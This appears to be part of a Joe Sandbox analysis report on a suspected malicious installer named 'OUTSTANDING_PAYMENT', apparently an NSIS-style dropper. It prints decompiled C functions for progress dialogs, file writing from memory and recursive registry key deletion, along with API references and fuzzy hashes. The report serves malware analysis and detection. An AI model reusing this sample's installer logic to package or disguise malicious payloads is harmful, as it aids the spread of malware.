                                                                                                                        0x00406988
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406990
                                                                                                                        0x00406996
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406996
                                                                                                                        0x0040699b

                                                                                                                        APIs
                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                        • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                        • CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                        • CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-2982765560
                                                                                                                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                        • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                                                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                                        • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                                                        0x0040303d
                                                                                                                        0x0040303f
                                                                                                                        0x00403046
                                                                                                                        0x00403049
                                                                                                                        0x00403049
                                                                                                                        0x0040304f
                                                                                                                        0x00000000
                                                                                                                        0x0040304f
                                                                                                                        0x0040305d
                                                                                                                        0x00000000
                                                                                                                        0x00403060
                                                                                                                        0x00403067
                                                                                                                        0x00403073
                                                                                                                        0x0040307b
                                                                                                                        0x004030b9
                                                                                                                        0x004030c2
                                                                                                                        0x00000000
                                                                                                                        0x004030c7
                                                                                                                        0x00403084
                                                                                                                        0x00403095
                                                                                                                        0x00000000
                                                                                                                        0x004030a3
                                                                                                                        0x00403084
                                                                                                                        0x004030cf

                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                                                                        • GetTickCount.KERNEL32 ref: 00403067
                                                                                                                        • wsprintfW.USER32 ref: 00403095
                                                                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                        • CreateDialogParamW.USER32 ref: 004030B9
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                                          • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                        • String ID: ... %d%%
                                                                                                                        • API String ID: 722711167-2449383134
                                                                                                                        • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                                                        • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                                                        • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                                                        • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                        0x00404f8d
                                                                                                                        0x00404f9a
                                                                                                                        0x00404fa0
                                                                                                                        0x00404fde
                                                                                                                        0x00404fde
                                                                                                                        0x00404fed
                                                                                                                        0x00404ff4
                                                                                                                        0x00000000
                                                                                                                        0x00404ff6
                                                                                                                        0x00404fa2
                                                                                                                        0x00404fb1
                                                                                                                        0x00404fb9
                                                                                                                        0x00404fbc
                                                                                                                        0x00404fce
                                                                                                                        0x00404fd4
                                                                                                                        0x00404fdb
                                                                                                                        0x00000000
                                                                                                                        0x00404fdb
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                                                        • GetMessagePos.USER32 ref: 00404FA2
                                                                                                                        • ScreenToClient.USER32 ref: 00404FBC
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                        • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                        • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                        0x00402fa3
                                                                                                                        0x00402fb1
                                                                                                                        0x00402fb7
                                                                                                                        0x00402fb7
                                                                                                                        0x00402fc5
                                                                                                                        0x00402fc7
                                                                                                                        0x00402fd3
                                                                                                                        0x00402fd8
                                                                                                                        0x00402fda
                                                                                                                        0x00402fda
                                                                                                                        0x00402fe5
                                                                                                                        0x00402ff5
                                                                                                                        0x00403007
                                                                                                                        0x00403007
                                                                                                                        0x0040300f

                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                        • wsprintfW.USER32 ref: 00402FE5
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                                                        • SetDlgItemTextW.USER32 ref: 00403007
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-1158693248
                                                                                                                        • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                        • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                                                        • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                                        • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 93%
                                                                                                                        			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                                                        0x00402950
                                                                                                                        0x00402952
                                                                                                                        0x00402957
                                                                                                                        0x0040295c
                                                                                                                        0x0040295f
                                                                                                                        0x00402969
                                                                                                                        0x0040296d
                                                                                                                        0x0040296d
                                                                                                                        0x00402973
                                                                                                                        0x00402980
                                                                                                                        0x00402988
                                                                                                                        0x0040298b
                                                                                                                        0x00402997
                                                                                                                        0x0040299a
                                                                                                                        0x004029a0
                                                                                                                        0x004029ae
                                                                                                                        0x004029b3
                                                                                                                        0x004029b7
                                                                                                                        0x004029ba
                                                                                                                        0x004029c3
                                                                                                                        0x004029cf
                                                                                                                        0x004029d3
                                                                                                                        0x004029d6
                                                                                                                        0x004029e0
                                                                                                                        0x004029ff
                                                                                                                        0x004029e7
                                                                                                                        0x004029ec
                                                                                                                        0x004029f4
                                                                                                                        0x004029f7
                                                                                                                        0x004029fc
                                                                                                                        0x004029fc
                                                                                                                        0x00402a06
                                                                                                                        0x00402a06
                                                                                                                        0x00402a13
                                                                                                                        0x00402a19
                                                                                                                        0x00402a1f
                                                                                                                        0x00402a1f
                                                                                                                        0x004029b7
                                                                                                                        0x00402a33
                                                                                                                        0x00402a35
                                                                                                                        0x00402a35
                                                                                                                        0x00402a3f
                                                                                                                        0x00402a40
                                                                                                                        0x00402a44
                                                                                                                        0x00402a48
                                                                                                                        0x00402a4e
                                                                                                                        0x00402a4e
                                                                                                                        0x00402a55
                                                                                                                        0x004022f1
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                        • GlobalFree.KERNEL32 ref: 00402A06
                                                                                                                        • GlobalFree.KERNEL32 ref: 00402A19
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2667972263-0
                                                                                                                        • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                        • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                                                        • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                        • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                                                                                        0x00404e7a
                                                                                                                        0x00404e7f
                                                                                                                        0x00404e87
                                                                                                                        0x00404e88
                                                                                                                        0x00404e95
                                                                                                                        0x00404e9d
                                                                                                                        0x00404e9e
                                                                                                                        0x00404ea0
                                                                                                                        0x00404ea2
                                                                                                                        0x00404ea4
                                                                                                                        0x00404ea7
                                                                                                                        0x00404ea7
                                                                                                                        0x00404eae
                                                                                                                        0x00404eb4
                                                                                                                        0x00404eb4
                                                                                                                        0x00404ebb
                                                                                                                        0x00404ec2
                                                                                                                        0x00404ec5
                                                                                                                        0x00404ec8
                                                                                                                        0x00404ec8
                                                                                                                        0x00404ecc
                                                                                                                        0x00404edc
                                                                                                                        0x00404ede
                                                                                                                        0x00404ee1
                                                                                                                        0x00404e8a
                                                                                                                        0x00404e8a
                                                                                                                        0x00404e91
                                                                                                                        0x00404e91
                                                                                                                        0x00404ee9
                                                                                                                        0x00404ef4
                                                                                                                        0x00404f0a
                                                                                                                        0x00404f1b
                                                                                                                        0x00404f37

                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                        • wsprintfW.USER32 ref: 00404F1B
                                                                                                                        • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s$H7B
                                                                                                                        • API String ID: 3540041739-107966168
                                                                                                                        • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                        • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                                                        • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                        • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 48%
                                                                                                                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                        0x00402eb4
                                                                                                                        0x00402ebd
                                                                                                                        0x00402ec6
                                                                                                                        0x00402ed2
                                                                                                                        0x00402edb
                                                                                                                        0x00402ee5
                                                                                                                        0x00402f0a
                                                                                                                        0x00402f10
                                                                                                                        0x00402f15
                                                                                                                        0x00402f16
                                                                                                                        0x00402f46
                                                                                                                        0x00402f1f
                                                                                                                        0x00402f21
                                                                                                                        0x00402f71
                                                                                                                        0x00402f74
                                                                                                                        0x00000000
                                                                                                                        0x00402f7a
                                                                                                                        0x00402f30
                                                                                                                        0x00402f35
                                                                                                                        0x00402f37
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402f3f
                                                                                                                        0x00402f44
                                                                                                                        0x00402f45
                                                                                                                        0x00402f45
                                                                                                                        0x00402f52
                                                                                                                        0x00402f5a
                                                                                                                        0x00402f61
                                                                                                                        0x00000000
                                                                                                                        0x00402f8a
                                                                                                                        0x00000000
